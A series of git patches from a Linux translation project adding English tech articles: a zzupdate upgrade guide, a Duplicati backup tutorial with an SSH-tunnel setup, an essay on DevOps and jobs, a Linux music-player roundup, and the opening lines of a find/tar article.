+``` +sudo cp /usr/local/turbolab.it/zzupdate/zzupdate.default.conf /etc/turbolab.it/zzupdate.conf +``` + +Once you have everything, just use the following command and it will start upgrading your Ubuntu system to a newer version (if there is any). + +`sudo zzupdate` + +Note that zzupdate upgrades the system to the next available version in case of a normal release. However, when you are running Ubuntu 16.04 LTS, it tries to search for the next long-term support version only and not the latest version available. + +If you want to move out of the LTS release and upgrade to the latest release, you will have change some options. + +For Ubuntu desktop, open **Software & Updates** and under **Updates** tab and change Notify me of a new Ubuntu version to " **For any new version** ". + +![Software Updater in Ubuntu][2] + +![Software Updater in Ubuntu][4] + +For Ubuntu server, edit the release-upgrades file. +``` +vi /etc/update-manager/release-upgrades + +Prompt=normal +``` + +### Configuring zzupdate [optional] + +zzupdate options to configure +``` +REBOOT=1 +``` + +If this value is 1, a system restart is performed after an upgrade. +``` +REBOOT_TIMEOUT=15 +``` + +This sets up the reboot timeout to 900 seconds as some hardware takes much longer to reboot than others. +``` +VERSION_UPGRADE=1 +``` + +Executes version progression if an upgrade is available. +``` +VERSION_UPGRADE_SILENT=0 +``` + +Version progression occurs automatically. +``` +COMPOSER_UPGRADE=1 +``` + +Value '1' will automatically upgrade the composer. +``` +SWITCH_PROMPT_TO_NORMAL=0 +``` + +This features switches the Ubuntu Version updated to normal i.e. if you have an LTS release running, zzupdate won't upgrade it to Ubuntu 17.10 if its set to 0. It will search for an LTS version only. In contrast, value 1 searches for the latest release whether you are running an LTS or a normal release. + +Once done, all you have to do is run in console to run a complete update of your Ubuntu system +``` +sudo zzupdate +``` + +### Final Words + +Though the upgrade process for Ubuntu is in itself an easy one, zzupdate reduces it to mere one command. No coding knowledge is necessary and the process is complete config file driven. I personally found itself a good tool to update several Ubuntu systems without the need of taking care of different things separately. + +Are you willing to give it a try? + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/zzupdate-upgrade-ubuntu/ + +作者:[Ambarish Kumar;Abhishek Prakash][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com +[1]:https://github.com/TurboLabIt/zzupdate +[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[3]:https://itsfoss.com/wp-content/uploads/2017/11/upgrade-ubuntu-single-command-featured-800x450.jpg +[4]:https://itsfoss.com/wp-content/uploads/2017/11/software-update-any-new-version-800x378.jpeg From fb4ac6a6db565dd565aa501cf3d0a01703a7e4a2 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 08:18:52 +0800 Subject: [PATCH 0611/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Notes=20on=20du?= =?UTF-8?q?al-booting=20Linux=20with=20BitLocker=20Device=20Encryption=20a?= =?UTF-8?q?nd=20Secure=20Boot?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit From 4219c8a1b5f8fda7a7fbd4e287181f0db347cce0 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 10:37:46 +0800 Subject: [PATCH 0612/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Personal=20Back?= =?UTF-8?q?ups=20with=20Duplicati=20on=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ersonal Backups with Duplicati on Linux.md | 314 ++++++++++++++++++ 1 file changed, 314 insertions(+) create mode 100644 sources/tech/20171212 Personal Backups with Duplicati on Linux.md diff --git a/sources/tech/20171212 Personal Backups with Duplicati on Linux.md b/sources/tech/20171212 Personal Backups with Duplicati on Linux.md new file mode 100644 index 0000000000..b6fcbdbd9e --- /dev/null +++ b/sources/tech/20171212 Personal Backups with Duplicati on Linux.md @@ -0,0 +1,314 @@ +Personal Backups with Duplicati on Linux +====== + +This tutorial is for performing personal backups to local USB hard drives, having encryption, deduplication and compression. + +The procedure was tested using [Duplicati 2.0.2.1][1] on [Debian 9.2][2] + +### Duplicati Installation + +Download the latest version from + +The software requires several libraries to work, mostly mono libraries. The easiest way to install the software is to let it fail the installation through dpkg and then install the missing packages with apt-get: + +sudo dpkg -i duplicati_2.0.2.1-1_all.deb +sudo apt-get --fix-broken install + +Note that the installation of the package fails on the first instance, then we use apt to install the dependencies. + +Start the daemon: + +sudo systemctl start duplicati.service + +And if you wish for it to start automatically with the OS use: + +sudo systemctl enable duplicati.service + +To check that the service is running: + +netstat -ltn | grep 8200 + +And you should receive a response like this one: + +[![][3]][4] + +After these steps you should be able to run the browser and access the local web service at http://localhost:8200 + +[![][5]][6] + +### Create a Backup Job + +Go to "Add backup" to configure a new backup job: + +[![][7]][8] + +Set a name for the job and a passphrase for encryption. You will need the passphrase to restore files, so pick a strong password and make sure you don't forget it: + +[![][9]][10] + +Set the destination: the directory where you are going to store the backup files: + +[![][11]][12] + +Select the source files to backup. I will pick just the Desktop folder for this example: + +[![][13]][14] + +Specify filters and exclusions if necessary: + +[![][15]][16] + +Configure a schedule, or disable automatic backups if you prefer to run them manually: + +[![][17]][18] + +I like to use manual backups when using USB drive destinations, and scheduled if I have a server to send backups through SSH or a Cloud based destination. + +Specify the versions to keep, and the Upload volume size (size of each partial file): + +[![][19]][20] + +Finally you should see the job created in a summary like this: + +[![][21]][22] + +### Run the Backup + +In the last seen summary, under Home, click "run now" to start the backup job. A progress bar will be seen by the top of the screen. + +After finishing the backup, you can see in the destination folder, a set of files called something like: +``` +duplicati-20171206T143926Z.dlist.zip.aes +duplicati-bdfad38a0b1f34b5db56c1de166260cd8.dblock.zip.aes +duplicati-i00d8dff418a749aa9d67d0c54b0e4149.dindex.zip.aes +``` + +The size of the blocks will be the one specified in the Upload volume size option. The files are compressed, and encrypted using the previously set passphrase. + +Once finished, you will see in the summary the last backup taken and the size: + +[![][23]][24] + +In this case it is only 1MB because I took a test folder. + +### Restore Files + +To restore files, simply access the web administration in http://localhost:8200, go to the "Restore" menu and select the backup job name. Then select the files to restore and click "continue": + +[![][25]][26] + +Select the restore files or folders and the restoration options: + +[![][27]][28] + +The restoration will start running, showing a progress bar on the top of the user interface. + +### Fixate the backup destination + +If you use a USB drive to perform the backups, it is a good idea to specify in the /etc/fstab the UUID of the drive, so that it always mount automatically in the /mnt/backup directory (or the directory of your choosing). + +To do so, connect your drive and check for the UUID: + +sudo blkid +``` +... +/dev/sdb1: UUID="4d608d85-e138-4546-9f22-4d78bef0b6a7" TYPE="ext4" PARTUUID="983a72cb-01" +... +``` + +And copy the UUID to include an entry in the /etc/fstab file: +``` +... +UUID=4d608d85-e138-4546-9f22-4d78bef0b6a7 /mnt/backup ext4 defaults 0 0 +... +``` + +### Remote Access to the GUI + +By default, Duplicati listens on localhost only, and it's meant to be that way. However it includes the possibility to add a password and to be accessible from the network: + +[![][29]][30] + +This setting is not recommended, as Duplicati has no SSL capabilities yet. What I would recommend if you need to use the backup GUI remotely, is using an SSH tunnel. + +To accomplish this, first enable SSH server in case you don't have it yet, the easiest way is running: + +sudo tasksel + +[![][31]][32] + +Once you have the SSH server running on the Duplicati host. Go to the computer from where you want to connect to the GUI and set the tunnel + +Let's consider that: + + * Duplicati backups and its GUI are running in the remote host 192.168.0.150 (that we call the server). + * The GUI on the server is listening on port 8200. + * jorge is a valid user name in the server. + * I will access the GUI from a host on the local port 12345. + + + +Then to open an SSH tunnel I run on the client: + +ssh -f jorge@192.168.0.150 -L 12345:localhost:8200 -N + +With netstat it can be checked that the port is open for localhost: + +netstat -ltn | grep :12345 +``` +tcp 0 0 127.0.0.1:12345 0.0.0.0:* LISTEN +tcp6 0 0 ::1:12345 :::* LISTEN +``` + +And now I can access the remote GUI by accessing http://127.0.0.1:12345 from the client browser + +[![][34]][35] + +Finally if you want to close the connection to the SSH tunnel you may kill the ssh process. First identify the PID: + +ps x | grep "[s]sh -f" +``` +26348 ? Ss 0:00 ssh -f [[email protected]][33] -L 12345:localhost:8200 -N +``` + +And kill it: + +kill -9 26348 + +Or you can do it all in one: + +kill -9 $(ps x | grep "[s]sh -f" | cut -d" " -f1) + +### Other Backup Repository Options + +If you prefer to store your backups on a remote server rather than on a local hard drive, Duplicati has several options. Standard protocols such as: + + * FTP + * OpenStack Object Storage / Swift + * SFTP (SSH) + * WebDAV + + + +And a wider list of proprietary protocols, such as: + + * Amazon Cloud Drive + * Amazon S3 + * Azure + * B2 Cloud Storage + * Box.com + * Dropbox + * Google Cloud Storage + * Google Drive + * HubiC + * Jottacloud + * mega.nz + * Microsoft One Drive + * Microsoft One Drive for Business + * Microsoft Sharepoint + * OpenStack Simple Storage + * Rackspace CloudFiles + + + +For FTP, SFTP, WebDAV is as simple as setting the server hostname or IP address, adding credentials and then using the whole previous process. As a result, I don't believe it is of any value describing them. + +However, as I find it useful for personal matters having a cloud based backup, I will describe the configuration for Dropbox, which uses the same procedure as for Google Drive and Microsoft OneDrive. + +#### Dropbox + +Let's create a new backup job and set the destination to Dropbox. All the configurations are exactly the same except for the destination that should be set like this: + +[![][36]][37] + +Once you set up "Dropbox" from the drop-down menu, and configured the destination folder, click on the OAuth link to set the authentication. + +A pop-up will emerge for you to login to Dropbox (or Google Drive or OneDrive depending on your choosing): + +[![][38]][39] + +After logging in you will be prompted to allow Duplicati app to your cloud storage: + +[![][40]][41] + +After finishing the last process, the AuthID field will be automatically filled in: + +[![][42]][43] + +Click on "Test Connection". When testing the connection you will be asked to create the folder in the case it does not exist: + +[![][44]][45] + +And finally it will give you a notification that the connection is successful: + +[![][46]][47] + +If you access your Dropbox account you will see the files, in the same format that we have seen before, under the defined folder: + +[![][48]][49] + +### Conclusions + +Duplicati is a multi-platform, feature-rich, easy to use backup solution for personal computers. It supports a wide variety of backup repositories what makes it a very versatile tool that can adapt to most personal needs. + + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/personal-backups-with-duplicati-on-linux/ + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com +[1]:https://updates.duplicati.com/beta/duplicati_2.0.2.1-1_all.deb +[2]:https://www.debian.org/releases/stable/ +[3]:https://www.howtoforge.com/images/personal_backups_with_duplicati/installation-netstat.png +[4]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/installation-netstat.png +[5]:https://www.howtoforge.com/images/personal_backups_with_duplicati/installation-web.png +[6]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/installation-web.png +[7]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-1.png +[8]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-1.png +[9]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-2.png +[10]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-2.png +[11]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-3.png +[12]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-3.png +[13]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-4.png +[14]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-4.png +[15]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-5.png +[16]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-5.png +[17]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-6.png +[18]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-6.png +[19]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-7.png +[20]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-7.png +[21]:https://www.howtoforge.com/images/personal_backups_with_duplicati/create-8.png +[22]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/create-8.png +[23]:https://www.howtoforge.com/images/personal_backups_with_duplicati/run-1.png +[24]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/run-1.png +[25]:https://www.howtoforge.com/images/personal_backups_with_duplicati/restore-1.png +[26]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/restore-1.png +[27]:https://www.howtoforge.com/images/personal_backups_with_duplicati/restore-2.png +[28]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/restore-2.png +[29]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-1.png +[30]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-1.png +[31]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-sshd.png +[32]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-sshd.png +[33]:https://www.howtoforge.com/cdn-cgi/l/email-protection +[34]:https://www.howtoforge.com/images/personal_backups_with_duplicati/remote-sshtun.png +[35]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/remote-sshtun.png +[36]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-1.png +[37]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-1.png +[38]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-2.png +[39]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-2.png +[40]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-4.png +[41]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-4.png +[42]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-5.png +[43]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-5.png +[44]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-6.png +[45]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-6.png +[46]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-7.png +[47]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-7.png +[48]:https://www.howtoforge.com/images/personal_backups_with_duplicati/db-8.png +[49]:https://www.howtoforge.com/images/personal_backups_with_duplicati/big/db-8.png From dce092787930648c78cf3dc06a0137cacea0b66b Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 10:40:50 +0800 Subject: [PATCH 0613/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Will=20DevOps?= =?UTF-8?q?=20steal=20my=20job=3F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171213 Will DevOps steal my job-.md | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 sources/tech/20171213 Will DevOps steal my job-.md diff --git a/sources/tech/20171213 Will DevOps steal my job-.md b/sources/tech/20171213 Will DevOps steal my job-.md new file mode 100644 index 0000000000..70290b8a87 --- /dev/null +++ b/sources/tech/20171213 Will DevOps steal my job-.md @@ -0,0 +1,52 @@ +Will DevOps steal my job? +====== +It's a common fear: Will DevOps be the end of my job? After all, DevOps means developers doing operations, right? DevOps is automation. What if I automate myself out of a job? Do continuous delivery and containers mean operations staff are obsolete? DevOps is all about coding: infrastructure-as-code and testing-as-code and this-or-that-as-code. What if I don't have the skill set to be a part of this? + +[DevOps][1] is a looming change, disruptive in the field, with seemingly fanatical followers talking about changing the world with the [Three Ways][2]--the three underpinnings of DevOps--and the tearing down of walls. It can all be overwhelming. So what's it going to be--is DevOps going to steal my job? + +### The first fear: I'm not needed + +As developers managing the entire lifecycle of an application, it's all too easy to get caught up in the idea of DevOps. Containers are probably a big contributing factor to this line of thought. When containers exploded onto the scene, they were touted as a way for developers to build, test, and deploy their code all-in-one. What role does DevOps leave for the operations team, or testing, or QA? + +This stems from a misunderstanding of the principles of DevOps. The first principle of DevOps, or the First Way, is _Systems Thinking_ , or placing emphasis on a holistic approach to managing and understanding the whole lifecycle of an application or service. This does not mean that the developers of the application learn and manage the whole process. Rather, it is the collaboration of talented and skilled individuals to ensure success as a whole. To make developers solely responsible for the process is practically the extreme opposite of this tenant--essentially the enshrining of a single silo with the importance of the entire lifecycle. + +There is a place for specialization in DevOps. Just as the classically educated software engineer with knowledge of linear regression and binary search is wasted writing Ansible playbooks and Docker files, the highly skilled sysadmin with the knowledge of how to secure a system and optimize database performance is wasted writing CSS and designing user flows. The most effective group to write, test, and maintain an application is a cross-discipline, functional team of people with diverse skill sets and backgrounds. + +### The second fear: My job will be automated + +Accurate or not, DevOps can sometimes be seen as a synonym for automation. What work is left for operations staff and testing teams when automated builds, testing, deployment, monitoring, and notifications are a huge part of the application lifecycle? This focus on automation can be partially related to the Second Way: _Amplify Feedback Loops_. This second tenant of DevOps deals with prioritizing quick feedback between teams in the opposite direction an application takes to deployment --from monitoring and maintaining to deployment, testing, development, etc., and the emphasis to make the feedback important and actionable. While the Second Way is not specifically related to automation, many of the automation tools teams use within their deployment pipelines facilitate quick notification and quick action, or course-correction based on feedback in support of this tenant. Traditionally done by humans, it is easy to understand why a focus on automation might lead to anxiety about the future of one's job. + +Automation is just a tool, not a replacement for people. Smart people trapped doing the same things over and over, pushing the big red George Jetson button are a wasted, untapped wealth of intelligence and creativity. Automation of the drudgery of daily work means more time to spend solving real problems and coming up with creative solutions. Humans are needed to figure out the "how and why;" computers can handle the "copy and paste." + +There will be no end of repetitive, predictable things to automate, and automation frees teams to focus on higher-order tasks in their field. Monitoring teams, no longer spending all their time configuring alerts or managing trending configuration, can start to focus on predicting alarms, correlating statistics, and creating proactive solutions. Systems administrators, freed of scheduled patching or server configuration, can spend time focusing on fleet management, performance, and scaling. Unlike the striking images of factory floors and assembly lines totally devoid of humans, automated tasks in the DevOps world mean humans can focus on creative, rewarding tasks instead of mind-numbing drudgery. + +### The third fear: I do not have the skillset for this + +"How am I going to keep up with this? I don't know how to automate. Everything is code now--do I have to be a developer and write code for a living to work in DevOps?" The third fear is ultimately a fear of self-confidence. As the culture changes, yes, teams will be asked to change along with it, and some may fear they lack the skills to perform what their jobs will become. + +Most folks, however, are probably already closer than they think. What is the Dockerfile, or configuration management like Puppet or Ansible, but environment as code? System administrators already write shell scripts and Python programs to handle repetitive tasks for them. It's hardly a stretch to learn a little more and begin using some of the tools already at their disposal to solve more problems--orchestration, deployment, maintenance-as-code--especially when freed from the drudgery of manual tasks to focus on growth. + +The answer to this fear lies in the third tenant of DevOps, the Third Way: _A Culture of Continual Experimentation and Learning_. The ability to try and fail and learn from mistakes without blame is a major factor in creating ever-more creative solutions. The Third Way is empowered by the first two ways --allowing for for quick detection of and repair of problems, and just as the developer is free to try and learn, other teams are as well. Operations teams that have never used configuration management or written programs to automate infrastructure provisioning are free to try and learn. Testing and QA teams are free to implement new testing pipelines and automate approval and release processes. In a culture that embraces learning and growing, everyone has the freedom to acquire the skills they need to succeed at and enjoy their job. + +### Conclusion + +Any disruptive practice or change in an industry can create fear or uncertainty, and DevOps is no exception. A concern for one's job is a reasonable response to the hundreds of articles and presentations enumerating the countless practices and technologies seemingly dedicated to empowering developers to take responsibility for every aspect of the industry. + +In truth, however, DevOps is "[a cross-disciplinary community of practice dedicated to the study of building, evolving, and operating rapidly changing resilient systems at scale][3]." DevOps means the end of silos, but not specialization. It is the delegation of drudgery to automated systems, freeing you to do what people do best: think and imagine. And if you're motivated to learn and grow, there will be no end of opportunities to solve new and challenging problems. + +Will DevOps take away your job? Yes, but it will give you a better one. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/will-devops-steal-my-job + +作者:[About The Author;Chris Collins;Chris Collins Is A Senior Automation Engineer;The Web Architecture Lead At Duke University S Office Of Information Technology. He S A Container;Automation Evangelist;Helps Leads Adoption Of Containers Within The University;Loves To Talk About Them With Anyone Who Will Listen;Much To The Annoyance Of The Co-Workers Who Sit Closest To Him.][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com +[1]:/resources/devops +[2]:http://itrevolution.com/the-three-ways-principles-underpinning-devops/ +[3]:https://theagileadmin.com/what-is-devops/ From 0cd7f7cd4494069bc2cefa089e51148e6876e1a7 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 10:42:07 +0800 Subject: [PATCH 0614/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2016=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=85=AD=2010:42:0?= =?UTF-8?q?7=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171213 Will DevOps steal my job-.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/sources/tech/20171213 Will DevOps steal my job-.md b/sources/tech/20171213 Will DevOps steal my job-.md index 70290b8a87..32069508c4 100644 --- a/sources/tech/20171213 Will DevOps steal my job-.md +++ b/sources/tech/20171213 Will DevOps steal my job-.md @@ -40,13 +40,13 @@ Will DevOps take away your job? Yes, but it will give you a better one. via: https://opensource.com/article/17/12/will-devops-steal-my-job -作者:[About The Author;Chris Collins;Chris Collins Is A Senior Automation Engineer;The Web Architecture Lead At Duke University S Office Of Information Technology. He S A Container;Automation Evangelist;Helps Leads Adoption Of Containers Within The University;Loves To Talk About Them With Anyone Who Will Listen;Much To The Annoyance Of The Co-Workers Who Sit Closest To Him.][a] +作者:[Chris Collins][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]:https://opensource.com -[1]:/resources/devops +[a]:https://opensource.com/users/clcollins +[1]:https://opensource.com/resources/devops [2]:http://itrevolution.com/the-three-ways-principles-underpinning-devops/ [3]:https://theagileadmin.com/what-is-devops/ From 6ecc85b9b5c84c6a368722e976df29e43f7966e8 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 10:50:29 +0800 Subject: [PATCH 0615/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Top=205=20Linux?= =?UTF-8?q?=20Music=20Players?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171215 Top 5 Linux Music Players.md | 139 ++++++++++++++++++ 1 file changed, 139 insertions(+) create mode 100644 sources/tech/20171215 Top 5 Linux Music Players.md diff --git a/sources/tech/20171215 Top 5 Linux Music Players.md b/sources/tech/20171215 Top 5 Linux Music Players.md new file mode 100644 index 0000000000..cfd4d14f23 --- /dev/null +++ b/sources/tech/20171215 Top 5 Linux Music Players.md @@ -0,0 +1,139 @@ +Top 5 Linux Music Players +====== +No matter what you do, chances are you enjoy a bit of music playing in the background. Whether you're a coder, system administrator, or typical desktop user, enjoying good music might be at the top of your list of things you do on the desktop. And, with the holidays upon us, you might wind up with some gift cards that allow you to purchase some new music. If your music format of choice is of a digital nature (mine happens to be vinyl) and your platform is Linux, you're going to want a good GUI player to enjoy that music. + +Fortunately, Linux has no lack of digital music players. In fact, there are quite a few, most of which are open source and available for free. Let's take a look at a few such players, to see which one might suit your needs. + +### Clementine + +I wanted to start out with the player that has served as my default for years. [Clementine][1] offers probably the single best ratio of ease-of-use to flexibility you'll find in any player. Clementine is a fork of the new defunct [Amarok][2] music player, but isn't limited to Linux-only; Clementine is also available for Mac OS and Windows platforms. The feature set is seriously impressive and includes the likes of: + + * Built-in equalizer + + * Customizable interface (display current album cover as background -- Figure 1) + + * Play local music or from Spotify, Last.fm, and more + + * Sidebar for easy library navigation + + * Built-in audio transcoding (into MP3, OGG, Flac, and more) + + * Remote control using [Android app][3] + + * Handy search function + + * Tabbed playlists + + * Easy creation of regular and smart playlists + + * CUE sheet support + + * Tag support + + + + +![Clementine][5] + + +Figure 1: The Clementine interface might be a bit old-school, but it's incredibly user-friendly and flexible. + +[Used with permission][6] + +Of all the music players I have used, Clementine is by far the most feature-rich and easy to use. It also includes one of the finest equalizers you'll find on a Linux music player (with 10 bands to adjust). Although it may not enjoy a very modern interface, it is absolutely unmatched for its ability to create and manipulate playlists. If your music collection is large, and you want total control over it, this is the player you want. + +Clementine can be found in the standard repositories and installed from either your distribution's software center or the command line. + +### Rhythmbox + +[Rhythmbox][7] is the default player for the GNOME desktop, but it does function well on other desktops. The Rhythmbox interface is slightly more modern than Clementine and takes a minimal approach to design. That doesn't mean the app is bereft of features. Quite the opposite. Rhythmbox offers gapless playback, Soundcloud support, album cover display, audio scrobbling from Last.fm and Libre.fm, Jamendo support, podcast subscription (from [Apple iTunes][8]), web remote control, and more. + +One very nice feature found in Rhythmbox is plugin support, which allows you to enable features like DAAP Music Sharing, FM Radio, Cover art search, notifications, ReplayGain, Song Lyrics, and more. + +The Rhythmbox playlist feature isn't quite as powerful as that found in Clementine, but it still makes it fairly easy to organize your music into quick playlists for any mood. Although Rhythmbox does offer a slightly more modern interface than Clementine (Figure 2), it's not quite as flexible. + +![Rhythmbox][10] + + +Figure 2: The Rhythmbox interface is simple and straightforward. + +[Used with permission][6] + +### VLC Media Player + +For some, [VLC][11] cannot be beat for playing videos. However, VLC isn't limited to the playback of video. In fact, VLC does a great job of playing audio files. For [KDE Neon][12] users, VLC serves as your default for both music and video playback. Although VLC is one of the finest video players on the Linux market (it's my default), it does suffer from some minor limitations with audio--namely the lack of playlists and the inability to connect to remote directories on your network. But if you're looking for an incredibly simple and reliable means to play local files or network mms/rtsp streams VLC is a quality tool. + +VLC does include an equalizer (Figure 3), a compressor, and a spatializer as well as the ability to record from a capture device. + +![VLC][14] + + +Figure 3: The VLC equalizer in action. + +[Used with permission][6] + +### Audacious + +If you're looking for a lightweight music player, Audacious perfectly fits that bill. This particular music player is fairly single minded, but it does include an equalizer and a small selection of effects that will please many an audiophile (e.g., Echo, Silence removal, Speed and Pitch, Voice Removal, and more--Figure 4). + +![Audacious ][16] + + +Figure 4: The Audacious EQ and plugins. + +[Used with permission][6] + +Audacious also includes a really handy alarm feature, that allows you to set an alarm that will start playing your currently selected track at a user-specified time and duration. + +### Spotify + +I must confess, I use spotify daily. I'm a subscriber and use it to find new music to purchase--which means I am constantly searching and discovering. Fortunately, there is a desktop client for Spotify (Figure 5) that can be easily installed using the [official Spotify Linux installation instructions][17]. Outside of listening to vinyl, I probably make use of Spotify more than any other music player. It also helps that I can seamlessly jump between the desktop client and the [Android app][18], so I never miss out on the music I enjoy. + +![Spotify][20] + + +Figure 5: The official Spotify client on Linux. + +[Used with permission][6] + +The Spotify interface is very easy to use and, in fact, it beats the web player by leaps and bounds. Do not settle for the [Spotify Web Player][21] on Linux, as the desktop client makes it much easier to create and manage your playlists. If you're a Spotify power user, don't even bother with the built-in support for the streaming client in the other desktop apps--once you've used the Spotify Desktop Client, the other apps pale in comparison. + +### The choice is yours + +Other options are available (check your desktop software center), but these five clients (in my opinion) are the best of the best. For me, the one-two punch of Clementine and Spotify gives me the best of all possible worlds. Try them out and see which one best meets your needs. + +Learn more about Linux through the free ["Introduction to Linux" ][22]course from The Linux Foundation and edX. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/12/top-5-linux-music-players + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com +[1]:https://www.clementine-player.org/ +[2]:https://en.wikipedia.org/wiki/Amarok_(software) +[3]:https://play.google.com/store/apps/details?id=de.qspool.clementineremote +[4]:https://www.linux.com/files/images/clementinejpg +[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/clementine.jpg?itok=_k13MtM3 (Clementine) +[6]:https://www.linux.com/licenses/category/used-permission +[7]:https://wiki.gnome.org/Apps/Rhythmbox +[8]:https://www.apple.com/itunes/ +[9]:https://www.linux.com/files/images/rhythmboxjpg +[10]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/rhythmbox.jpg?itok=GOjs9vTv (Rhythmbox) +[11]:https://www.videolan.org/vlc/index.html +[12]:https://neon.kde.org/ +[13]:https://www.linux.com/files/images/vlcjpg +[14]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/vlc.jpg?itok=hn7iKkmK (VLC) +[15]:https://www.linux.com/files/images/audaciousjpg +[16]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/audacious.jpg?itok=9YALPzOx (Audacious ) +[17]:https://www.spotify.com/us/download/linux/ +[18]:https://play.google.com/store/apps/details?id=com.spotify.music +[19]:https://www.linux.com/files/images/spotifyjpg +[20]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/spotify.jpg?itok=P3FLfcYt (Spotify) +[21]:https://open.spotify.com/browse/featured +[22]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux From 9400bd471d5404f524cc02aeb8ce30bb3e90e01b Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 11:06:18 +0800 Subject: [PATCH 0616/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20find?= =?UTF-8?q?=20and=20tar=20files=20into=20a=20tar=20ball?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...w to find and tar files into a tar ball.md | 113 ++++++++++++++++++ 1 file changed, 113 insertions(+) create mode 100644 sources/tech/20171215 How to find and tar files into a tar ball.md diff --git a/sources/tech/20171215 How to find and tar files into a tar ball.md b/sources/tech/20171215 How to find and tar files into a tar ball.md new file mode 100644 index 0000000000..8208943d4e --- /dev/null +++ b/sources/tech/20171215 How to find and tar files into a tar ball.md @@ -0,0 +1,113 @@ +How to find and tar files into a tar ball +====== + +The find command used to search for files in a directory 